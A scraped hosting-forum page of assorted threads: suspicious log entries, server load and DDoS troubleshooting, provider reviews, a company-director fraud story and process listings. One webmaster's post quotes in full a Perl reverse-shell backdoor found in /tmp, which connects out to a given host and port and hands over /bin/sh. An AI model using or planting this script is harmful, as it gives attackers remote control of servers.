Highly Suspicious Activity - Log Files
Dec 17, 2007
what to look out for in the log files, but a couple of things jumped out at me over the weekend:
I had 5 of these, I followed the link (I suppose is the referrer) but it takes you to a polish-hosted russian webpage that tries to infect your browser. So DONT VISIT THE WEBSITE unless you're virus checker is fully up to date!
Code:
shop.######.com: [15/Dec/2007:02:52:43 +0000] 87.118.120.23 - - "GET / HTTP/1.0" 200 21466 [url] (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
As this is only a GET, I'm not sure what the purpose of this really was.
Also I seem to be getting loads of these recently:
Code:
shop.######.com: [17/Dec/2007:08:21:41 +0000] 82.19.60.98 - - "GET /_vti_bin/index.php?main_page=page_not_found HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
Which I read is an automated hacker-bot checking for an unpatched MS server.
So my question is this;
What's the most effective thing we (as webmasters/hosts) can do to combat and report this sort of thing so we fight back against what's likely to be related to organised crime?
View 4 Replies
ADVERTISEMENT
Nov 27, 2008
Well one of my servers has been under a DDoS attack for a while and I've been doing things to keep it down but there is a suspicious process that keeps running and I am guessing that is whats keeping the server load up because when I stop apache the load goes down but not for long.
The process is this:
Code:
/opt/adobe/fms/fmscore -adaptor _defaultRoot_ -vhost _defaultVHost_ -app registry -inst registry -tag -conf /opt/adobe/fms/conf/Server.xml -name _defaultRoot_:_defaultVHost_:registry:registry:
Does anyone know what this process is or how to block it?
View 9 Replies
View Related
Jul 24, 2009
I have a small VPS, with few websites each one with very low visitors in average less than100 visits per day
CentOS 2.6.9
Plesk
PHP 5.1.6
Apache/2.2.3
Few days ago some Forum spammers signed up to one of the forums. One of them: stopforumspam.com/ipcheck/212.178.2.3
Today I was away for few 5 hours after I came back I recived a notice from my script that "SMF could not connect to the database"
I checked and I noticed almost all of my sites are not responding. MySql was working. A script on remote server which uses mysql from my server loaded but with dealy
------------------Next step-------------------
log to SSH
# uptime
# 12:XX:XX up XXX days, 5:06, X users, load average: 10.58, 8.86, 5.86
my normal load is less than 0.9
-----------------check open ports ---------------------------
netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 1936/couriertcpd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 32447/mysqld
tcp 0 0 0.0.0.0:106 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 9943/smbd
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 1916/couriertcpd
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 1840/couriertcpd
tcp 0 0 0.0.0.0:8880 0.0.0.0:* LISTEN 9626/httpsd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 7645/httpd
tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 [MyServerIP]:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 [MyServerIP]:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 [MyServerIP]:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 13820/sshd
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
View 2 Replies
View Related
Jun 17, 2008
I am an administrator/developer for a website and we are using Awstats to get the usage statistics. Lately we are getting hits from a bunch of IP Addresses which differ only in the Host ID part.
For example:
Here are the logs
Address-------Page Views----------Last visit
64.12.116.209----25------------17 Jun 2008 12:22
64.12.110.94------2------------17 Jun 2008 12:20
64.12.116.142----11------------17 Jun 2008 12:20
64.12.116.135----42------------17 Jun 2008 12:19
64.12.116.130----18------------17 Jun 2008 12:17
64.12.116.80-----11------------17 Jun 2008 12:17
64.12.116.139----15------------17 Jun 2008 12:15
64.12.116.132----16------------17 Jun 2008 12:14
64.12.116.210----33------------17 Jun 2008 12:10
64.12.116.208----21------------17 Jun 2008 12:06
64.12.116.144-----3------------17 Jun 2008 12:04
64.12.117.5------22------------17 Jun 2008 12:20
64.12.117.11-----50------------17 Jun 2008 12:16
64.12.117.8------56------------17 Jun 2008 12:08
64.12.117.207----17------------17 Jun 2008 12:07
..
...
Notice how most of the IP addresses are 64.12.116.xxx or 64.12.117.yyy. Similarly I found addresses matching 65.55.109.zzz and a bunch more.
This is making me wonder if this is some kind of an attack (Especially since Awstats seems to say that the hosts list does not include the IP addresses of spiders/crawlers/bots)? We are concerned. Please advise.
The above Hosts List (sorted by Last Visit) was generated by using Awstats our website logs.
View 3 Replies
View Related
Mar 24, 2008
I got this system email:
Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken
So I looked and the file says this:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!
");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!
");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!
");
connect(SOCKET, $paddr) || die("Error: $!
");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
That one line 'echo "`uname -a`";echo "`id`";/bin/sh';
View 13 Replies
View Related
Jan 28, 2007
While there's no problem in our server sometimes loading increases extremely ( over 100 ) While my checkings i stopped the apachi and check the logs , i've seen the lines above
Quote:
[Sun Jan 28 14:26:33 2007] [error] [client 88.243.102.59] File does not exist: /home/xxxx/public_html/404.shtml
[Sun Jan 28 14:27:12 2007] [error] [client 88.226.41.159] File does not exist: /home/xxxxxx/public_html/Themes/colatesi_v3/images/exp.gif
[Sun Jan 28 14:27:12 2007] [error] [client 88.226.41.159] File does not exist: /home/xxxxxx/public_html/404.shtml
[Sun Jan 28 14:34:21 2007] [error] child process 20292 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20105 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20287 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 19964 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20298 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20106 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20278 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20279 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20299 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20281 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20110 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:21 2007] [error] child process 20111 still did not exit, sending a SIGKILL
[Sun Jan 28 14:34:22 2007] [error] could not make child process 19022 exit, attempting to continue anyway
[Sun Jan 28 14:34:22 2007] [error] could not make child process 19077 exit, attempting to continue anyway
[Sun Jan 28 14:34:22 2007] [notice] caught SIGTERM, shutting down
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
exim: SIGTERM received - message abandoned
View 6 Replies
View Related
May 18, 2007
We're currently looking into migrating a two-server HA setup to something VPS-based, mainly because we'd like to leave the HA stuff (data replication to hot-standby server, fail-over) to the hoster.
We hope to find somebody that hosts VPSs on a cluster of machines, replicates the VPS filesystems to a hot-standby node and, in case of cluster node failure, simply reboots the VPSs that the failed cluster node took with it on the hot-standby node. To us from inside the VPS this would then simply look like a single highly available server. No more database replication, etc.
The only company that offers this seems to be thomas-krenn.com. If I understand them correctly, they build two-server Linux clusters, run Virtuozzo on both servers and replicate the filesystem of the VPSs by means of DRBD from the active cluster node to the hot-standby node. In case of failure of the active node the VPSs are booted on the hot-standby node. So, I should be up and running again in a matter of minutes, probably after a filesystem check.
This sounds pretty intriguing to me and I wonder whether this is as good as it sounds. Does anybody have any experience with thomas-krenn.com and their clustered VPS offering?
Do you know of anybody else that offers something like this? Sounds like a logical next step in VPS hosting to me, so there should be other people with the same idea.
I guess that the grid/utility computing people out there do something similar.
However, most reviews of these companies that I've read were pretty devastating.
View 9 Replies
View Related
Apr 11, 2009
I posted a review about Tailor Made Servers (TMS) back in December of 2008 however it was wiped out during the infamous "WHT Incident" but I see that it has returned, although in a very incomplete state. Here is a repost of the original review along with a few minor changes to celebrate our 2 year anniversary! (Changes made to original review will have a red font color.)
Technical Support [10/10]:
First things first, TMS are an un-managed provider so don't expect any hand holding if you run into some obscure software or operating system problems. That's not to say TMS wouldn't help you, I'm sure they would to some extent, but it should never be expected from an un-managed provider.
We have a total of 74 tickets recorded with TMS since April of 2007. Twelve of those tickets were high priority requests to either manually reboot a server or check the console. Three of those high priority tickets were false alarms, but the other seven tickets were all answered within a few minutes at the very most.
When I say the tickets were answered, I don't mean a canned reply of "We're looking into it!" then an hour later someone decides to start working on it and then another hour later it's finally resolved. If you submit a high priority ticket, it's given immediate attention and resolved as fast as humanly possible.
Manual reboots take on average 10 minutes, some have been performed in a couple of minutes while the longest we ever had to wait was about 15 minutes which is what they advertise. There have only been a couple of hardware issues, a failing NIC was recently replaced in under 15 minutes, a server died last month and a chassis swap was done in under 3 hours. Hard to find any faults here - the technical support & response times are very reassuring and above average when compared to a lot of other un-managed providers.
Network & Uptime [10/10]:
TMS are located in the prestigious Colo4Dallas facility and using an impressive blend of InterNAP, Level3, Time Warner and XO Communications for bandwidth providers. There are also InterNAP FCP devices in use to attempt to provide the most efficient routing possible and also work around any problems thanks to its intelligent routing capabilities. This differs from BGP in the sense that BGP will always provide the shortest path possible - not necessarily the best path.
The latency and throughput are what you would expect from a reasonably multi-homed provider in Texas. Typical response times to my location in Ontario, Canada are about 60ms while response times to the United Kingdom are around 110ms. Average response times to other parts of the US are nothing short of impressive, 25ms to Chicago, 35ms to Los Angeles, 20ms to Atlanta and 50ms to Seattle.
There was a network blip on March 31, 2009 that caused some instability due to an apparent network upgrade that went wrong. These things do happen, however I feel that communication could have been a bit better in terms of notifying clients in advance. Outside of that one issue the last significant outage was in May of 2007 when a faulty router module had to be replaced and the downtime was a little under 1 hour. TMS clearly has a solid network and should satisfy everyone from web hosting providers looking for maximum uptime to die hard gamers looking for the lowest latency possible.
Hardware Quality & Deployment [10/10]:
All of the newer servers are Dell so you know you're getting quality hardware. The hard drives are a mix of new and old, but they all work perfectly fine with no S.M.A.R.T errors detected using multiple short & long tests. Some people would prefer to always have brand new hard drives, but that's not very economical for a lot of providers and I'm totally OK with that.
Servers are deployed extremely fast during business hours. In most cases if you order a server in the morning, it'll be setup later that afternoon. I've never had to wait more than 6 hours for a server, but I tend to order in the morning so I can't comment on how fast deployments are later in the day or on weekends.
The best deals for TMS are listed under the Dedicated Hosting Offers forum and not on their website, so be sure to check them out. Ordering a server from TMS is completely hassle free and straight forward. You pick the server configuration, pay via PayPal or Credit Card and wait for deployment. There's no faxing or scanning of documents and what not for verification of orders - but I'm sure JoseQ does his own fraud screening.
Overall [9/10]
I can't say enough good things about Tailor Made Servers! The staff is very knowledgeable and genuinely shows that they care, the response times are nothing short of incredible and I can honestly say I sleep better at night knowing our servers are in good hands if something goes wrong.
It truly is a great feeling not always having to worry about network problems, or how long it's going to take to get a manual reboot done, or replace failing hardware if need be. TMS are on top of their game, definitely one of the most underrated and under mentioned providers on WHT!
Why did I rate TMS 9 out of 10 after this glowing review? Well, there's always room for improvement and I don't think it's realistic to rate any provider a 10 out of 10. So what can be improved? When I first posted this review last year, I mentioned that KVM access would be nice and I believe they have since been added - perhaps JoseQ can clarify on that. You know, I honestly can't think of anything major I would like to see improved at this point.
That's pretty much it; if you're looking for an unrivaled dedicated server provider definitely take a look at Tailor Made Servers! Their best deals are always under the Dedicated Hosting Offers forum so be sure to check that out or send TMS - JoseQ a message to see what they can do for you. You have my word, you will not be disappointed and the only regret you'll ever have with TMS is not signing up earlier.
View 14 Replies
View Related
Dec 1, 2008
Tailor Made Servers - TMS - 1 Year and 8 Month Review - Highly Recommended!
Here's my long overdue review for Tailor Made Servers [url]
and I'd like to urge everyone looking for a high quality unmanaged provider to take a few minutes to read this. I'm terrible at writing long posts, so I apologize if this review is a bit all over the place - it's just so hard to contain my excitement!
Technical Support [10/10]:
First things first, TMS are an unmanaged provider so don't expect any hand holding if you run into some obscure software or operating system problems. That's not to say TMS wouldn't help you, I'm sure they would to some extent, but it should never be expected from an unmanaged provider.
We have a total of 57 tickets recorded with TMS since April of 2007. Ten of those tickets were high priority requests to either manually reboot a server or check the console. Three of those high priority tickets were false alarms, but the other seven tickets were all answered within a few minutes at the very most.
When I say the tickets were answered, I don't mean a canned reply of "We're looking into it!" then an hour later someone decides to start working on it and then another hour later it's finally resolved. If you submit a high priority ticket, it's given immediate attention and resolved as fast as humanly possible.
Manual reboots take on average 10 minutes, some have been performed in a couple of minutes while the longest we ever had to wait was about 15 minutes which is what they advertise. There have only been a couple of hardware issues, a failing NIC was recently replaced in under 15 minutes, a server died last month and a chassis swap was done in under 3 hours. Hard to find any faults here - the technical support
View 10 Replies
View Related
Oct 10, 2009
I was just wondering is there any way to log SSH activity on server. or some sort of keylogger.
View 3 Replies
View Related
Jan 14, 2008
my Windows 2003 server is showing a very steady amount of action on Port 1028 and Port 135.
The Process is listed as "Unknown" with a PID of 0
The Local IP is 127.0.0.1
The Remote IP is 127.0.0.1
The Remote Port is either 1028 or 135
The State is "TIME_WAIT"
The Protocol is TCP
The path to the executable is blank. At any given time there are at least 20 active processes of this. The virus scan says all is well.
View 1 Replies
View Related
Sep 11, 2007
Does CentOS4 logs every activity done by a SSH user? Or is there such script/software to do that?
View 10 Replies
View Related
Jul 29, 2007
I am interested in setup user activity limits to avoid peaks on the server load, I have readen a lot about PAM and limits.conf but still have no idea on how set this limits. Most of the examples are similar to this page http://www.seifried.org/lasg/users/ but they are still confusing to me
>> I would like to setup rules like this:
Customers may not use more than 2% CPU daily, 3% memory daily, run more than 10 simultaneous processes per user, allow any process to run for longer than 30 CPU seconds, run any process that consumes more than 20% of available CPU at any time, or run any process that consumes more than 16 MB of memory.
View 6 Replies
View Related
Jan 23, 2009
Last week, we received a letter [url] from Companies House (the UK entity which governs companies).
It was addressed to Exoware, with all the correct contact details, reminding me to submit statutory documents by a certain date or face a fine and/or prosecution.
It was sent to us, because apparently, Exoware is a director of Jarhosts limited. This is not true. We have never even heard of Jarhosts limited up to this point, but it appears they had ceased trading by the time we received the letter.
A few emails were exchanged between us and Companies House, which didn't really get us anywhere as they couldn't seem to understand our position, so I phoned them up myself. I got through to someone and explained our position and she informed me about the company and said they registered Exoware as a director of Jarhosts limited on 05/12/08 and they themselves promptly resigned from the company afterwards, so Exoware was the only remaining director.
After I declared that Exoware had no affiliation whatsoever with Jarhosts limited, she promptly forwarded the case to a department for dealing with fraudulent documents and said the company will dissolve soon and that we may hear from Companies House fraud department in the future.
So, my concerns are now at ease, but my curiosity still remains.
Does anybody know Jarhosts; how long they were around for, who they were owned by, or any relevant information about them? Or does anybody know of any reason that people would sign up a random business in the same industry as a director before bailing out of their own company? It all seems very obscure.
View 10 Replies
View Related
Aug 6, 2007
I have a dedicated box with Fasthosts and they tell me they've detected that the server is talking out to other networks via IRC although there's no activity on port 53.
Can anyone point me in the right direction of steps to take to find out what this is and eliminate it?
Recent changes to server include...
Started SpamAssassin (with network checks on - could these be the cause?)
Installed Mongrel as a proxy server for RoR apps and configured Apache on port 80 to make use of two Mongrel processes.
Some other data about server as requested on sticky thread on this board:
Linux OS: Fedora Core 6
Kernel: 2.6.18-1.2798.fc6
Control Panel: Matrix LSA
Processes (ps -auxf):
Quote:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2032 556 ? Ss Jul31 0:01 init [3]
root 2 0.0 0.0 0 0 ? S Jul31 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SN Jul31 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S Jul31 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S Jul31 0:00 [migration/1]
root 6 0.0 0.0 0 0 ? SN Jul31 0:00 [ksoftirqd/1]
root 7 0.0 0.0 0 0 ? S Jul31 0:00 [watchdog/1]
root 8 0.0 0.0 0 0 ? S< Jul31 0:00 [events/0]
root 9 0.0 0.0 0 0 ? S< Jul31 0:00 [events/1]
root 10 0.0 0.0 0 0 ? S< Jul31 0:00 [khelper]
root 11 0.0 0.0 0 0 ? S< Jul31 0:00 [kthread]
root 15 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kblockd/0]
root 16 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kblockd/1]
root 17 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kacpid]
root 123 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [cqueue/0]
root 124 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [cqueue/1]
root 127 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [khubd]
root 129 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kseriod]
root 194 0.0 0.0 0 0 ? S Jul31 0:00 \_ [pdflush]
root 196 0.0 0.0 0 0 ? S< Jul31 0:14 \_ [kswapd0]
root 197 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [aio/0]
root 198 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [aio/1]
root 363 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kpsmoused]
root 393 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [ata/0]
root 394 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [ata/1]
root 395 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [ata_aux]
root 399 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [scsi_eh_0]
root 400 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [scsi_eh_1]
root 401 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kjournald]
root 421 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kauditd]
root 1305 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [hda_codec]
root 1461 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kmpathd/0]
root 1462 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kmpathd/1]
root 1469 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kmirrord]
root 1491 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [kjournald]
root 1493 0.0 0.0 0 0 ? S< Jul31 0:01 \_ [kjournald]
root 1495 0.0 0.0 0 0 ? S< Jul31 0:07 \_ [kjournald]
root 2105 0.0 0.0 0 0 ? S< Jul31 0:02 \_ [rpciod/0]
root 2106 0.0 0.0 0 0 ? S< Jul31 0:00 \_ [rpciod/1]
root 2143 0.0 0.0 0 0 ? S Aug04 0:00 \_ [pdflush]
root 447 0.0 0.0 2212 332 ? S<s Jul31 0:00 /sbin/udevd -d
root 1629 0.0 0.0 1624 364 ? Ss Jul31 0:00 cpuspeed -d -n
root 1630 0.0 0.0 1624 348 ? S Jul31 0:00 \_ cpuspeed -d -n
root 1931 0.0 0.0 1692 580 ? Ss Jul31 0:06 syslogd -m 0
root 1934 0.0 0.0 1640 316 ? Ss Jul31 0:00 klogd -x
root 1943 0.0 0.0 1632 280 ? Ss Jul31 0:00 irqbalance
rpc 1964 0.0 0.0 1776 416 ? Ss Jul31 0:00 portmap
root 1982 0.0 0.0 1884 604 ? Ss Jul31 0:00 rpc.statd
root 1989 0.0 0.0 1628 232 ? S Jul31 0:00 /usr/sbin/courierlogger -pid=/var/spool/authdaemon/pid -star
root 1990 0.0 0.0 2120 544 ? S Jul31 0:00 \_ /usr/libexec/courier-authlib/authdaemond
root 2008 0.0 0.1 2964 1452 ? S Jul31 0:01 \_ /usr/libexec/courier-authlib/authdaemond
root 2009 0.0 0.0 2172 752 ? S Jul31 0:01 \_ /usr/libexec/courier-authlib/authdaemond
root 2010 0.0 0.1 2584 1172 ? S Jul31 0:01 \_ /usr/libexec/courier-authlib/authdaemond
root 2011 0.0 0.0 2172 752 ? S Jul31 0:01 \_ /usr/libexec/courier-authlib/authdaemond
root 2012 0.0 0.1 2964 1456 ? S Jul31 0:01 \_ /usr/libexec/courier-authlib/authdaemond
root 2022 0.0 0.0 4932 308 ? Ss Jul31 0:00 rpc.idmapd
dbus 2034 0.0 0.0 3140 308 ? Ss Jul31 0:00 dbus-daemon --system
root 2042 0.0 0.0 2344 416 ? Ss Jul31 0:00 hcid: processing events
root 2048 0.0 0.0 1712 368 ? Ss Jul31 0:00 /usr/sbin/sdpd
root 2072 0.0 0.0 0 0 ? S< Jul31 0:00 [krfcommd]
root 2107 0.0 0.0 0 0 ? S Jul31 0:00 [lockd]
root 2124 0.0 0.0 12692 552 ? Ssl Jul31 0:00 pcscd
root 2141 0.0 0.0 1876 348 ? Ss Jul31 0:00 /usr/bin/hidd --server
root 2154 0.0 0.0 9044 708 ? Ssl Jul31 0:00 automount
root 2170 0.0 0.0 1640 392 ? Ss Jul31 0:00 /usr/sbin/acpid
root 2187 0.0 0.0 5172 716 ? Ss Jul31 0:02 /usr/sbin/sshd
root 14427 0.0 0.2 8172 2468 ? Ss 14:09 0:00 \_ sshd: root@pts/0
root 14432 0.0 0.1 4620 1472 pts/0 Ss 14:09 0:00 \_ -bash
root 17290 0.0 0.0 4192 936 pts/0 R+ 16:35 0:00 \_ ps -auxf
root 2258 0.0 0.0 4488 544 ? S Jul31 0:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/my.cnf --p
mysql 2294 0.0 0.6 139508 6432 ? Sl Jul31 1:26 \_ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedi
root 2401 0.0 0.1 6240 1344 ? Ss Jul31 0:06 /usr/libexec/postfix/master
postfix 20416 0.0 0.1 6484 1612 ? S Aug03 0:01 \_ qmgr -l -t fifo -u
postfix 16541 0.0 0.1 6300 1664 ? S 15:31 0:00 \_ pickup -l -t fifo -u
postfix 17111 0.0 0.1 6292 1644 ? S 16:21 0:00 \_ anvil -l -t unix -u
postfix 17248 0.0 0.1 6308 1980 ? S 16:33 0:00 \_ trivial-rewrite -n rewrite -t unix -u
postfix 17273 0.0 0.1 6468 1876 ? S 16:34 0:00 \_ smtp -t unix -u
postfix 17274 0.0 0.1 6468 1880 ? S 16:34 0:00 \_ smtp -t unix -u
postfix 17275 0.0 0.1 6468 1876 ? S 16:34 0:00 \_ smtp -t unix -u
postfix 17276 0.0 0.1 6464 1832 ? S 16:34 0:00 \_ smtp -t unix -u
postfix 17277 0.0 0.1 6468 1880 ? S 16:34 0:00 \_ smtp -t unix -u
postfix 17278 0.0 0.1 6468 1880 ? S 16:34 0:00 \_ smtp -t unix -u
postfix 17281 0.0 0.1 6340 1660 ? S 16:34 0:00 \_ bounce -z -n defer -t unix -u
postfix 17283 0.0 0.1 6340 1640 ? S 16:34 0:00 \_ bounce -z -n defer -t unix -u
root 2411 0.0 0.0 1864 292 ? Ss Jul31 0:00 gpm -m /dev/input/mice -t exps2
root 2434 0.0 0.1 5804 1648 ? Ss Jul31 0:00 /usr/sbin/httpd-matrixsa
apache 15100 0.0 0.1 5948 1856 ? S Aug05 0:00 \_ /usr/sbin/httpd-matrixsa
apache 15101 0.0 0.1 5948 1704 ? S Aug05 0:00 \_ /usr/sbin/httpd-matrixsa
apache 14593 0.0 0.1 5948 1852 ? S 14:22 0:00 \_ /usr/sbin/httpd-matrixsa
root 2442 0.0 0.0 5216 596 ? Ss Jul31 0:00 crond
xfs 2465 0.0 0.0 3132 548 ? Ss Jul31 0:00 xfs -droppriv -daemon
root 2480 0.0 0.0 2204 348 ? Ss Jul31 0:00 /usr/sbin/atd
root 2501 0.0 0.1 24212 1372 ? S Jul31 0:00 /usr/bin/python /usr/sbin/yum-updatesd
avahi 2510 0.0 0.0 2864 612 ? Ss Jul31 0:00 avahi-daemon: running [server88-208-201-113.local]
avahi 2511 0.0 0.0 2864 124 ? Ss Jul31 0:00 \_ avahi-daemon: chroot helper process
68 2520 0.0 0.1 5708 1100 ? Ss Jul31 0:00 hald
root 2522 0.0 0.0 3336 520 ? S Jul31 0:00 \_ hald-runner
68 2553 0.0 0.0 2292 568 ? S Jul31 0:00 \_ hald-addon-acpi: listening on acpid socket /var/run/
root 2554 0.0 0.0 3392 520 ? S Jul31 0:00 \_ /usr/libexec/hald-addon-cpufreq
68 2560 0.0 0.0 2288 564 ? S Jul31 0:00 \_ hald-addon-keyboard: listening on /dev/input/event2
68 2563 0.0 0.0 2288 564 ? S Jul31 0:00 \_ hald-addon-keyboard: listening on /dev/input/event0
ntp 2607 0.0 0.0 4128 944 ? Ss Jul31 0:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root 2667 0.0 0.0 1628 380 tty1 Ss+ Jul31 0:00 /sbin/mingetty tty1
root 2668 0.0 0.0 1628 360 tty2 Ss+ Jul31 0:00 /sbin/mingetty tty2
root 2671 0.0 0.0 1628 360 tty3 Ss+ Jul31 0:00 /sbin/mingetty tty3
root 2672 0.0 0.0 1628 360 tty4 Ss+ Jul31 0:00 /sbin/mingetty tty4
root 2673 0.0 0.0 1628 360 tty5 Ss+ Jul31 0:00 /sbin/mingetty tty5
root 2683 0.0 0.0 1628 360 tty6 Ss+ Jul31 0:00 /sbin/mingetty tty6
root 4656 0.0 0.0 1628 296 ? S Jul31 0:00 /usr/sbin/courierlogger -pid=/var/run/imapd.pid -start -name
root 4657 0.0 0.0 1732 504 ? S Jul31 0:00 \_ /usr/lib/courier-imap/libexec/couriertcpd -address=0 -ma
1003 8661 0.0 0.1 2344 1316 ? S 10:00 0:11 \_ /usr/lib/courier-imap/bin/imapd /home/default/polloc
1001 9528 0.2 0.2 3860 2772 ? S 10:24 1:05 \_ /usr/lib/courier-imap/bin/imapd /home/default/aaronp
1003 15914 0.0 0.1 2200 1072 ? S 14:43 0:00 \_ /usr/lib/courier-imap/bin/imapd /home/default/polloc
1001 17199 0.0 0.0 2124 1020 ? S 16:27 0:00 \_ /usr/lib/courier-imap/bin/imapd /home/default/aaronp
root 4663 0.0 0.0 1632 168 ? S Jul31 0:00 /usr/sbin/courierlogger -pid=/var/run/imapd-ssl.pid -start -
root 4664 0.0 0.0 1732 428 ? S Jul31 0:00 \_ /usr/lib/courier-imap/libexec/couriertcpd -address=0 -ma
root 4669 0.0 0.0 1632 300 ? S Jul31 0:00 /usr/sbin/courierlogger -pid=/var/run/pop3d.pid -start -name
root 4670 0.0 0.0 1732 500 ? S Jul31 0:00 \_ /usr/lib/courier-imap/libexec/couriertcpd -address=0 -ma
root 4675 0.0 0.0 1628 168 ? S Jul31 0:00 /usr/sbin/courierlogger -pid=/var/run/pop3d-ssl.pid -start -
root 4676 0.0 0.0 1736 428 ? S Jul31 0:00 \_ /usr/lib/courier-imap/libexec/couriertcpd -address=0 -ma
root 14860 0.0 1.5 33316 15544 ? Ss Aug03 0:01 /usr/sbin/httpd
apache 30327 0.0 2.1 43480 21688 ? S 01:55 0:16 \_ /usr/sbin/httpd
apache 30328 0.0 2.0 43220 21180 ? S 01:55 0:15 \_ /usr/sbin/httpd
apache 30329 0.0 2.1 43616 21868 ? S 01:55 0:13 \_ /usr/sbin/httpd
apache 30330 0.0 2.1 44132 22308 ? S 01:55 0:16 \_ /usr/sbin/httpd
apache 30331 0.0 2.2 44660 23384 ? S 01:55 0:15 \_ /usr/sbin/httpd
apache 30332 0.0 2.2 44604 22820 ? S 01:55 0:14 \_ /usr/sbin/httpd
apache 30333 0.0 2.0 43576 21532 ? S 01:55 0:17 \_ /usr/sbin/httpd
apache 30334 0.0 2.1 43908 22064 ? S 01:55 0:17 \_ /usr/sbin/httpd
apache 11425 0.0 1.9 42328 20276 ? S 10:53 0:12 \_ /usr/sbin/httpd
apache 16125 0.0 1.6 40572 17052 ? S 15:04 0:01 \_ /usr/sbin/httpd
apache 16126 0.0 1.6 40564 16696 ? S 15:04 0:01 \_ /usr/sbin/httpd
apache 16581 0.0 1.5 40508 16412 ? S 15:34 0:00 \_ /usr/sbin/httpd
apache 16582 0.0 1.6 40612 16436 ? S 15:34 0:00 \_ /usr/sbin/httpd
apache 16637 0.0 1.6 40496 16660 ? S 15:38 0:00 \_ /usr/sbin/httpd
mongrel 15242 0.0 2.8 45536 29104 ? Sl Aug03 0:03 /usr/bin/ruby /usr/bin/mongrel_rails start -d -e production
mongrel 15245 0.0 0.0 42184 828 ? Sl Aug03 0:02 /usr/bin/ruby /usr/bin/mongrel_rails start -d -e production
apache 27873 0.0 0.0 1608 244 ? Ss Aug04 0:00 /usr/local/apache/bin/httpd -DSSL
apache 28536 0.0 0.2 4556 2408 ? S Aug04 0:01 /usr/local/apache/bin/httpd -DSSL
apache 32052 0.0 0.2 4552 2400 ? S Aug04 0:01 /usr/local/apache/bin/httpd -DSSL
apache 32094 0.0 0.2 4552 2400 ? S Aug04 0:01 /usr/local/apache/bin/httpd -DSSL
root 15106 0.0 0.2 9836 2056 ? Ss Aug05 0:00 cupsd
